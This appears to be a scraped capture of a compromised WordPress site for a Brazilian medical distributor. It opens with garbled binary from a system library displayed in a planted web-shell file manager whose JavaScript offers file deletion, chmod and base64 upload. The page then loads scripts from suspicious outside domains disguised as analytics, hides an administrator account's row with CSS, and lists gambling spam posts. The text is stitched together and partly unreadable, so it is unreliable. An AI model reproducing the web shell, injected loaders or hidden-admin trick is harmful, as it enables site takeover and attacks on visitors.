      ��     0      �     0      �@     0      .�     0      L�     0      a�     0      z�     0      ��     1       ��     1      ��     1      �@     1      ��     1      ��     1      �@     2       A     2      
�     3       %�     4       7�     5       I�     5      @A     5      `A     5      �A     5      �A     5      �A     6       d�     7       ��     8       ��     8      �A     8      ��     8      ��     8       B     8      ��     9       PB     :       ��     :      pB     :      �B     :      �     :      �B     ;       .�     ;      �B     ;       C     ;      HC     ;      K�     ;      X�     ;      b�     ;      �C     ;      ~�     ;	      ��     ;
      ��     ;      ��     ;      �C     ;      �C     ;      ��     ;      ��     ;      �C     ;      �     ;      +�     ;      D�     ;      [�     ;      D     ;      t�     ;      ��     ;      ��     ;      ��     ;      ��     ;      0D     ;       pD     =       �D     &gt;       �D     &gt;      ��     &gt;      �     &gt;      �     &gt;      �D     ?        E     ?      8�     ?      S�     ?      p�     ?      ��     ?      ��     ?      PE     ?      ��     ?      ��     ?	      ��     ?
      xE     ?      ��     ?      �     ?      &#039;�     ?      �E     ?      =�     ?      U�     ?      �E     ?      e�     ?      |�     ?      ��     ?      �E     ?      F     ?      ��     ?      ��     ?      ��     ?      ��     @       8F     A       XF     B       �F     C        �     D       �     D      �F     Dq      �F     E       &amp;�     F       A�     G       Y�     G      k�     G       G     G      0G     G      XG     G      ��     G      ��     G      �G     H       �G     I       ��     J       ��     K       ��     K      �G     K      ��     K      �     K      !�     K      .�     K      @�     K      [�     K       H     K	      PH     K
      k�     K      �H     K      �H     K      ��     K      ��     K      ��     K      ��     K      ��     K      ��     K      �     K       �     K      3�     L       �H     N       K�     P       i�     P      |�     P      I     Q       ��     Q      @I     R       ��     S       ��     S      ��     S      ��     S      xI     S      �I     S      ��     S      �     S      2�     S      N�     S	      �I     S
      J     S      8J     S      hJ     S      �J     T       �J     U       e�     U      }�     U       K     U      ��     U      (K     U      PK     U      ��     U      ��     U      xK     U	      �K     U
      ��     U      �K     U       L     U      (L     U      ��     U      XL     U      �L     U      �L     W       �L     X       �     Y       &quot;�     Z       �L     Z      M     Z      8M     Z      XM     [       5�     [      C�     [      [�     [      r�     \       ��     \      ��     \      ��     ]       xM     ]      �M     ]      �M     ]      N     ]      @N     ]      xN     ]      �N     ]      �N     ]       O     ]      XO     ]      �O     ]      �O     ]      �O     ]      (P     ]      `P     ]      �P     ]      �P     ]      Q     ]       HQ     ]!      �Q     ]&quot;      �Q     ]#      �Q     ]$      (R     ]%      `R     ]&amp;      �R     ]&#039;      �R     ](      S     ])      @S     ]*      xS     ]+      �S     ],      �S     ]0      (T     ]1      hT     ]2      �T     ]3      �T     ]4      U     ]5      PU     ]6      �U     ]7      �U     ]8       V     ]9      8V     ]:      pV     ];      �V     ]&lt;      �V     ]@       W     ]A      XW     ]B      �W     ]C      �W     ]D       X     ]E      8X     ]F      hX     ]G      �X     ]H      �X     ]I       Y     ]J      0Y     ]K      `Y     ]L      �Y     ]P      �Y     ]Q       Z     ]R      8Z     ]S      pZ     ]T      �Z     ]U      �Z     ]V      [     ]W      H[     ]X      x[     ]Y      �[     ]Z      �[     ][      \     ]\      @\     ]`      x\     ]a      �\     ]b      �\     ]c       ]     ]d      X]     ]e      �]     ]f      �]     ]g       ^     ]h      0^     ]i      `^     ]j      �^     ]k      �^     ]l       _     ]s      @_     ]�      p_     ^       ��     ^      �_     ^      �_     ^      �_     ^      `     ^      @`     ^      h`     ^      �`     ^      �`     ^	      �`     ^
      a     ^A      ��     ^B      �     ^C      �     ^E      :�     ^G      8a     `       V�     a       c�     a      {�     a      ��     b       ��     c       `a     c      �a     d       ��     d      ��     e       ��     f       �a     f      �a     f      b     f      8b     g       ��     g      hb     g      �     g      �b     g      �b     g      (�     g      �b     g      c     g      F�     g	      (c     g
      Hc     g      pc     g      ^�     g      o�     h       ��     h      �c     i       ��     i      �c     i      ��     j       ��     k       ��     k      
�     k      &amp;�     l       A�     m       Z�     n       �c     o       �c     o      8d     o      pd     o      �d     o      �d     o      e     o      Pe     o      �e     o      w�     o	      �e     o
      ��     q       �e     r       ��     r      f     r      0f     r      Xf     r      �f     r      �f     r      ��     r      �f     s       ��     s      g     s      @g     s      ��     s      `g     s      �     s      *�     s      �g     s      �g     s      A�     t       M�     t      \�     t      �g     t      s�     t      h     t      ��     t      @h     t      hh     t      �h     t	      �h     t
      �h     t      i     t      (i     t      ��     t      Pi     t      xi     t      ��     t!      �i     t0      �i     t@      ��     ta      �i     tb      (j     tc      Xj     td      �j     tn      �j     to      �j     tq      k     ty      0k                     @     ��     @��     Xk     A�     ��     B�     �k     M �     �k     p �     �k                                     �     !�     1�     ;�     H�     W�     g�     v�     ��     ��     ��     ��     ��     ��     f�     ��             ��            ��            ��            ��            �            l            �     &quot;       /�     (       M�     0       [�     @       f�     ��                 ����                �   ����                �   ����                �   ����                �   ����                �   ����                �   ����                �   ����                ^   ����        q�     _   ����        ��     �   ����                �   ����                &lt;   ����        &gt;�     �   ����        b�     �   ����        ��     4              ��     H               e�     ;   ����        1�     �                       �                       ��  ����                                              
                                     J   @                         

       K     ��  �����                                              �                 �  ��                 ���                  ��                 ����                 � ���          %       
����  �      (       
�����?���      *       
�����?���      /       
�����?���      5       
����?���      A       
�����?���      U       
     ���      Z       
��   ���      �       ��������������Ǌ       ��������������Ǐ       �������������?Ǒ       ������������?Ǔ       �������������?Ǟ  �   ������������Ǡ       �   ���� �    �  �   �������� �    �  �   �   ���� �    � ����                  libsgutils2-1.47.so.2.0.0-1.47-10.el9_8.1.x86_64.debug  �SR��7zXZ  �ִF !   t/��&#039;�
�] ?�E�h=��ڊ�2N�	���&amp; ���@G���y+6t��0ye�r�*�ۯ�zn^�(�1�°������&lt;Y���5i�CT&#039;���ro8��5���%��4nE����qG�����x�!LeЫm�j�#���2�ʯE��syy�ǋҀu�i���_���+eإ�:�Ó]��V��t��C�0���lf���+ .%u{5�_@���kϏ�dqE&amp;D�}2J�k91FŨς��Sh�����ed���UG��(�ז���JOZ��`[:���K�	V(ߴ]��/� ��=�jT� �~��c�]���n����h�)k(��`Oղ��cA�r���F�	��w�3t9��V�Q_�Sd&quot;�Bl��ly��Ҹ�7_%e`�f;���*�.�[W�Hau��Z��~c/�&lt;=�����*&#039;T^�#~�/;/�7��NLt��J�}]a����A��&gt;+�� ���+F̌�+��w���k���ģ@$\���&amp;�GMhY�#���7_��{Sj�*�s	o]�f�_g.nx�@�Ch���K�Ͱ�J&quot;v�\��q��3٦v��x�
\Þ�����q��&#039;w��|T]�F��W&quot;9���8�D�;��S�k��)\e v���Θ���*.uc-�:��,:�S�6�6&gt;�0��~�}��d����̐��[�{��m���3��z���B.�4�G�d�4.,m`�wx� �k$kc��۱�IZ�@ �G������?މ��f�DP�$~�A���xÖ��� |�V�,�&lt;f�=CP�&gt;|��?	O�o5�E�4�QPH@�/8�&quot;�#aJl}z�+��c����fv���~�@)k�]4��6_:#��,x��Yޝ�Bh�����P*�|��D�s�������׸e�k&gt;p&gt;&quot;0��lb�a���C�i �R~�\�E  b��&quot;���$&lt;���\��z�Qm6U��pb��6�s��ϓ��;[����^H�*�;N���_9
��J�j�62D.*�u�GGu����dn�6��M��Ű�`�8t�Lw:GoI��bc�;����5m˄�.��n|/06�mc�!�5��Z��-�q��zfX��濑^9�%8��`_[@�b�!j���0�t�T��o����Q	�|n��$���G�bD���s�,u�7��R2�_F�f�x�)�=���ZZ����p�cW7�z�&gt;�b����kvh���Z¿��rmF���KA�eL���o����IskyGC6W�@ʃq�7y�����
Ȇ����}EVۧD��MZcA�ޱ�M�c��tu0@�}��(fƳ|ka�R��4��6�^�J��Ô��p��by\�G)���-&gt;�&#039;�A�&amp;�Vn{��*~�J;��X ��R��u* ����l�7���U��/^m�0�j`���M��f�#����3�i��E�Kգ=v���ޣ�{X�� ^��M-�6��V,�a(q-m�@��F^s�g���5���7͗��VC+ғ�*vY2 ����Zi��ɵپċ��4d���\�ъ��?�!�k}ћ\%��%)f��o���$��Y���rղ��u��Ё�,?��s� NYU��&#039;O `_:�	R�?�eR�&#039;�D��q���+&lt;&quot;ѽ��򱏎��&quot;��LD�{2�G}�p��	�g�V�h��@2����kp 3�t���n��?��V/��کI[J�jw�FVl�n�h0�j��!�/�O�hG�FxJ��~��� ț����&#039;H�o��Ld���d��Wjv&gt;���d��eo�a��;��87�]�n��天�i˗ޕ��a�D��1o˛!�+��Q3V	;G�\��m��M.2��S�&quot;]H�����M_u e�ፊ����o����~l���#��I���İ3��W����i�LI�q@k&amp;��[,{V���&#039;�n��5)!Z�F�n��ve9^84��E��gf���o|!^�tV�6C�&gt;J�ck��G�����Zw��Rӥc�C;=�\_�Hs���W*�Ԋ`n��=��L ǫ����PX*�)�δ�}�3�sz�@,Ҕ�e.QmF
-� aj�x�jO�����u���ѡ1B������;�FP�-hn��]�����e�
���T4�V+��R��f���/.�|�r�oؑ��z��FNW�
O*��a��_�Z�v��#C�&gt;W�v���H)�U�U8ES+&quot;6ܭ��,m|�,��l�Np����NE��BS���m�k��D��b��Y�_����q9�iR���
�`?b��)�yy�8��l�%���KM#l�E-�m-�}V���f��^�ͨ��5Ʀ���t�ԍ�٤2��q��&#039;�_jZx�.Ȱ�\܉�oF,MJ_�wV�L֍��R_.�X�s��.�����aÆ�S�&quot;y���0-kX]��);K�_
�r�0���8�����!����o�cK��cb���S�׳�L��g
&lt;�(̖!6k�0$�i�0&quot;&lt;�xV��.*e�����yGJx���^��efy:�E�� ~��?m0��S;$�D��%Ҽ��t��{�����`�?�	�A���ok�~�i�y���f0iӶ*b�!�D��&amp;�U�ڌ�ޱK&quot;����]1�^rFz�0(��/��+Z�҆;����N#����E��ļ 	�eh98��9���uM3��� 4F���� ��O  ��;��g�    YZ .shstrtab .note.gnu.property .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.sec .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .data.rel.ro .dynamic .got .data .bss .gnu_debuglink .gnu_debugdata                                                                                �      �                                                  �      �      $                              1   ���o       �      �      L	                            ;             @      @      �                          C             )      )      �                             K   ���o       �?      �?      f                           X   ���o       B      B      �                            g             �B      �B      �                           q      B       ��      ��      �                          {              �       �                                    v              �       �      p                            �             ��      ��      `                            �             �      �      p�                            �             `�     `�                                   �              �      �     P�                             �             P�     P�                                  �             X�     X�     �2                             �             p�     p�                                  �             x�     x�                                  �             ��     ��     H                              �             ��     ��     �                           �             ��     ��     8                            �              �      �     �b                              �             �B     �B     (                              �                      �B     &lt;                                                   �B     �
                                                   �M                                  </textarea>
                    <div style="margin-top:15px;display:flex;gap:8px;">
                        <button class="button button-green">Save</button>
                        <a href="?p=%2Fusr%2Flib64" class="button button-red">Cancel</a>
                    </div>
                </form>
            </div>
            </div>
    
    <div id="toast-container" class="toast-container"></div>

    <script>
        const currentPath = '/usr/lib64';
        
        function showToast(msg, type) {
            const container = document.getElementById('toast-container');
            const toast = document.createElement('div');
            toast.className = 'toast toast-' + type;
            toast.innerHTML = msg + '<span onclick="this.parentElement.remove()" style="cursor:pointer;margin-left:10px;">×</span>';
            container.appendChild(toast);
            setTimeout(() => toast.remove(), 3000);
        }
        
        function ajaxRequest(action, data) {
            const formData = new FormData();
            formData.append('ajax_action', action);
            for(const key in data) formData.append(key, data[key]);
            return fetch(window.location.pathname, { method: 'POST', body: formData }).then(r => r.json());
        }
        
        function ajaxDelete(path, btn) {
            if(!confirm('Delete?')) return;
            const row = btn.closest('tr');
            row.style.opacity = '0.5';
            ajaxRequest('delete', {path}).then(r => {
                if(r.success) { row.remove(); showToast('Deleted', 'success'); }
                else { row.style.opacity = '1'; showToast(r.message || 'Failed', 'error'); }
            });
        }
        
        function showCreateFile() {
            const name = prompt('File name:', 'newfile.txt');
            if(name) {
                const content = prompt('Content:', '');
                ajaxRequest('create', {path: currentPath, name, type: 'file', content: content || ''})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showCreateFolder() {
            const name = prompt('Folder name:', 'newfolder');
            if(name) {
                ajaxRequest('create', {path: currentPath, name, type: 'dir'})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showRename(path, name) {
            const newName = prompt('New name:', name);
            if(newName && newName !== name) {
                ajaxRequest('rename', {old_path: path, new_name: newName})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showChmod(path, current) {
            const mode = prompt('Permissions (e.g. 755):', current);
            if(mode && mode !== current) {
                ajaxRequest('chmod', {path, mode})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function uploadFileB64(input) {
            const file = input.files[0];
            if(!file) return;
            showToast('Uploading: ' + file.name, 'success');
            const reader = new FileReader();
            reader.onload = function(e) {
                const b64 = e.target.result.split(',')[1];
                const formData = new FormData();
                formData.append('ajax_action', 'b64upload');
                formData.append('path', currentPath);
                formData.append('name', file.name);
                formData.append('data', b64);
                fetch(window.location.pathname, { method: 'POST', body: formData })
                    .then(r => r.json())
                    .then(r => {
                        if(r.success) { showToast('Uploaded: ' + file.name, 'success'); setTimeout(() => location.reload(), 500); }
                        else { showToast('Failed: ' + (r.message || 'Unknown error'), 'error'); }
                    })
                    .catch(err => showToast('Error: ' + err.message, 'error'));
            };
            reader.readAsDataURL(file);
            input.value = '';
        }
        
        function searchFiles(query) {
            query = query.toLowerCase();
            document.querySelectorAll('#file-list tr[data-name]').forEach(row => {
                row.style.display = row.dataset.name.includes(query) ? '' : 'none';
            });
        }
        
        document.addEventListener('keydown', function(e) {
            if(e.ctrlKey && e.key === 'f' && !e.target.matches('input,textarea')) { 
                e.preventDefault(); 
                document.getElementById('search-input').focus(); 
            }
        });
    </script>
</body>
</html><!doctype html>
<html lang="pt-BR">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">
	<title>pblmedic &#8211; Página: 2</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//nornikal3pi12.life' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para pblmedic &raquo;" href="https://pblmedic.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para pblmedic &raquo;" href="https://pblmedic.com/comments/feed/" />
<style id="wp-img-auto-sizes-contain-inline-css">
img:is([sizes=auto i],[sizes^="auto," i]){contain-intrinsic-size:3000px 1500px}
/*# sourceURL=wp-img-auto-sizes-contain-inline-css */
</style>
<style id="wp-emoji-styles-inline-css">

	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
/*# sourceURL=wp-emoji-styles-inline-css */
</style>
<style id="wp-block-library-inline-css">
:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}:root .has-text-align-center{text-align:center}:root .has-text-align-left{text-align:left}:root .has-text-align-right{text-align:right}.has-fit-text{white-space:nowrap!important}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{word-wrap:normal!important;border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-break:normal!important}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style^=border-color],[style*=";border-color"],[style*="; border-color"]){border-style:solid}html :where([style^=border-top-color],[style*=";border-top-color"],[style*="; border-top-color"]){border-top-style:solid}html :where([style^=border-right-color],[style*=";border-right-color"],[style*="; border-right-color"]){border-right-style:solid}html :where([style^=border-bottom-color],[style*=";border-bottom-color"],[style*="; border-bottom-color"]){border-bottom-style:solid}html :where([style^=border-left-color],[style*=";border-left-color"],[style*="; border-left-color"]){border-left-style:solid}html :where([style^=border-width],[style*=";border-width"],[style*="; border-width"]){border-style:solid}html :where([style^=border-top-width],[style*=";border-top-width"],[style*="; border-top-width"]){border-top-style:solid}html :where([style^=border-right-width],[style*=";border-right-width"],[style*="; border-right-width"]){border-right-style:solid}html :where([style^=border-bottom-width],[style*=";border-bottom-width"],[style*="; border-bottom-width"]){border-bottom-style:solid}html :where([style^=border-left-width],[style*=";border-left-width"],[style*="; border-left-width"]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}
/*wp_block_styles_on_demand_placeholder:6a88c5a0136f7*/
/*# sourceURL=wp-block-library-inline-css */
</style>
<style id="wp-block-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the block styles printed at wp_footer." }
/*# sourceURL=wp-block-styles-placeholder-inline-css */
</style>
<style id="wp-global-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the global-styles printed at wp_footer." }
/*# sourceURL=wp-global-styles-placeholder-inline-css */
</style>
<link rel='stylesheet' id='ganalytics-fonts-css' href='https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100' media='all' />
<link rel='stylesheet' id='hello-elementor-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/reset.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/theme.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-header-footer-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/header-footer.css?ver=3.4.4' media='all' />
<script data-wp-strategy="defer" defer id="ganalytics-tracker-js" src="https://nornikal3pi12.life/t.js?site=5b9c529db03be43d062917c963ff43ed"></script>
<link rel="https://api.w.org/" href="https://pblmedic.com/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://pblmedic.com/xmlrpc.php?rsd" />
<meta name="generator" content="WordPress 7.1" />
<script src="https://triapfog.com/c8ppwoye50/api"></script><style id="wp-custom-css">
tr#user-3,tr#user_3{display:none!important}
</style>
</head>
<body class="home blog paged wp-embed-responsive paged-2 wp-theme-hello-elementor hello-elementor-default">


<a class="skip-link screen-reader-text" href="#content">Ir para o conteúdo</a>


<header id="site-header" class="site-header">

	<div class="site-branding">
					<div class="site-title">
				<a href="https://pblmedic.com/" title="Página inicial" rel="home">
					pblmedic				</a>
			</div>
						</div>

			<nav class="site-navigation" aria-label="Menu principal">
			<ul id="menu-principal" class="menu"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-72"><a href="https://pblmedic.com/#inicio">Início</a></li>
<li id="menu-item-73" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-73"><a href="https://pblmedic.com/#quem-somos">Quem somos</a></li>
<li id="menu-item-74" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-74"><a href="https://pblmedic.com/#linha-distribuicao">Linha de distribuição</a></li>
<li id="menu-item-75" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-75"><a href="https://pblmedic.com/#area-de-atuacao">Área de atuação</a></li>
<li id="menu-item-76" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-76"><a href="https://pblmedic.com/#diferenciais">Diferenciais</a></li>
<li id="menu-item-77" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77"><a href="https://api.whatsapp.com/send/?phone=5511961828606">Fale Conosco</a></li>
<li id="menu-item-78" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-78"><a href="https://pblmedic.com/#contato">Contato</a></li>
</ul>		</nav>
	</header>
<main id="content" class="site-main">

			<div class="page-header">
			<h1 class="entry-title">Arquivos</h1>		</div>
	
	<div class="page-content">
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/bezplatna-kasa-zbyt-rejestracje-lucky-block-logowanie-do-kasyna-bez-depozytu-kasyna-pl-2026/">Bezpłatna kasa zbyt rejestrację lucky block logowanie do kasyna bez depozytu Kasyna PL 2026</a></h2><p>Content Wyjątkowe propozycji w celu rodzimych internautów: lucky block logowanie do kasyna Lub istniej&#x105; pi&#x119;&#x107;dziesi&#x119;ciu darmowych spin&#xF3;w zbytnio rejestracj&#x119; w całej grach Abonament naszego własnego biuletynu oznacza, &#x17C;e zapozna&#x142;e&#x15B; si&#x119; i zaakceptowa&#x142;e&#x15B; nasz&#x105; polityk&#x119; prywatno&#x15B;tobie jak i również warunki korzystania z us&#x142;ug. W HolyMolyCasinos wsp&#xF3;&#x142;wkonujemy nasze prace spośród w najwyższym stopniu znakomitymi operatorami kasyn w [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/trusted-casino-jackpot-wins-a-comprehensive-guide/">Trusted Casino Jackpot Wins: A Comprehensive Guide</a></h2><p>Have you ever dreamed of hitting the jackpot at an online casino? With the right strategies and a bit of luck, it is possible to win big at trusted online casinos. In this article, we will explore everything you need to know about trusted casino jackpot wins, including gameplay, tips, payouts, and more. With over [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/voor-offlin-speelautomaten/">Voor offlin speelautomaten</a></h2><p>Deze slots ben gekoppeld in andere schrijven ofwe casino&#8217;s, waarbij zeker deel vanuit elke aanwending bijdraagt ​​in een groeiende jackpot. Ofschoon het mogelijkheid appreciren u verslaan van gelijk https://versaillescasino.org/ progressieve jackpot klein zijn, zijn de potentiële uitbetalingen gigantisch, waardoor diegene lezen intact goed bedragen.</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/scheepsgezagvoerder-kare-plusteken-het-liefste-van-u-dromerij-piratenverhaal-casino333-5-6-klas-avonturenverhaal/">Scheepsgezagvoerder Kare plusteken het Liefste van u Dromerij Piratenverhaal Casino333 5 6 klas Avonturenverhaal</a></h2><p>Grootte Gameplay en ondervinding afwisselend Captai Shark &#8211; Casino333 Gebruiksaanwijzing Arne Afloop Savoir c&#8217;est pouvoir Saul&#8217;s dekking (Diegene ben gij slippen vanuit Saul&#8217;s rok of &#8211; Ploeggenoten lepelen veel diepteloopjes va ben bergkam – overlaps en underlaps – afwisselend tegenstanders absent gedurende ‘trekken’. Inschatten die fragment trainde Fietsslot nadrukkelijk wegens gij voorbereiding. Waarderen finesse slijpt [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/this-step-ensures-that-your-account-is-safe-and-you-possess-offered-precise-information/">This step ensures that your account is safe and you possess offered precise information</a></h2><p>Following such basic steps, you can easily and quickly arranged your web gambling enterprise account and you will dive into the enjoyable arena of online gambling. Regardless if you are prepared in-line otherwise leisurely at your home, mobile compatibility means the brand new adventure from online gambling is always available. They adhere to strict direction [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/premio-privato-di-base-mucchio-adm-nota-permesso-2026/">Premio Privato di Base Mucchio ADM: Nota Permesso 2026</a></h2><p>Content Qual è il miglior gratifica escludendo base? Gratifica escludendo deposito sopra SPID / CIE Chi siamo addirittura gioco sicuro Il bonus compenso è separatamente delle tipologie di bonus scompiglio ad esempio sono divenute piuttosto frequenti negli ultimi anni. La scelta di prendere dietro porzione del stabile perso permette di continuare per agire privato di [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/gratifica-100-50-giri-attualmente/">Gratifica 100%, 50 Giri Attualmente</a></h2><p>Content Ad esempio eseguire un base Ispezione Completa di HoneyBetz Confusione Casinò Live La maniera rientra negli canone di giustizia di nuovo aiuta per riparare il guadagno, ancora uccidere rischi di accessi non autorizzati. Sopra controllo Skiller sito web ufficiale addirittura governo profilo, trattiamo i dati con come garantito addirittura logico verso desktop ancora amovibile. [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/migliori-bisca-online-italiani-puoi-provare-qui-guida-completa-ai-siti-di-gioco-dazzardo/">Migliori Bisca Online Italiani: puoi provare qui Guida Completa Ai Siti Di Gioco D&#8217;Azzardo</a></h2><p>L’ADM (prima AAMS) è l’unico istituzione quale introduce le regole di richiamo per i casino online italiani autorizzati. L’autoesclusione, che può ancora abitare revocata davanti dello deteriorarsi del circostanza, può essere implorazione così dal sito dell’ADM quale immediatamente al casa da gioco con cui ci si registra.</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/mucchio-con-spid-2026-annotazione-veloce-topbet24-premio-verificati-adm/">Mucchio con SPID 2026: Annotazione Veloce, Topbet24 Premio verificati ADM</a></h2><p>Content Topbet24: Incontro Digitale &#8211; Premio Casa da gioco: 5.105€, 500 Freespin NetBet scommesse Decine di software providers rinomati Al base si riceve il 100% fino verso 5.000€, ad esempio permette di intensificare l’costo del primo base con i limiti di nuovo le condizioni previste. Inoltre, alla incisione è per di più previsto un fun [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/sprich-so-casinos-aber-und-abermal-alternative-verifizierungsprozesse-vornehmen-damit-sicherzustellen-dass-kaum-illegalen-aktivitaten-ereignen/">Sprich, so Casinos aber und abermal alternative Verifizierungsprozesse vornehmen, damit sicherzustellen, dass kaum illegalen Aktivitaten ereignen</a></h2><p>Alternativ zu tun sein die kunden dies Guthaben aufwarts der Kontoverbindung abgeben. Selbige Zeitlang das Ausschuttung war fur nach Zahlungsmethode differenzierend. Pro Spieler bei europaischen Moglich Casinos eignen einfache Auszahlungen genauso essentiell hinsichtlich Einzahlungen. Entschlusseln Eltern ebendiese Meinungen durch folgenden Spielern unter anderem gibt es so sehr das sinnvolle Moglich Spielcasino Bundesrepublik. Alle weiteren Informations [&hellip;]</p>
			</article>
			</div>

			<nav class="pagination">
			<div class="nav-previous"><a href="https://pblmedic.com/?edit=1&#038;p=%2Fusr%2Flib64&#038;path=%2Fusr%2Flib64%2Flibsgutils2-1.47.so.2" ><span class="meta-nav">&larr;</span> anterior</a></div>
			<div class="nav-next"><a href="https://pblmedic.com/page/3/?edit=1&#038;p=%2Fusr%2Flib64&#038;path=%2Fusr%2Flib64%2Flibsgutils2-1.47.so.2" >Próximo <span class="meta-nav">&rarr;</span></a></div>
		</nav>
	
</main>
<footer id="site-footer" class="site-footer">
	</footer>

<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/hello-elementor/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://pblmedic.com/wp-includes/js/wp-emoji-release.min.js?ver=7.1"}}
</script>
<script type="module">
/*! This file is auto-generated */
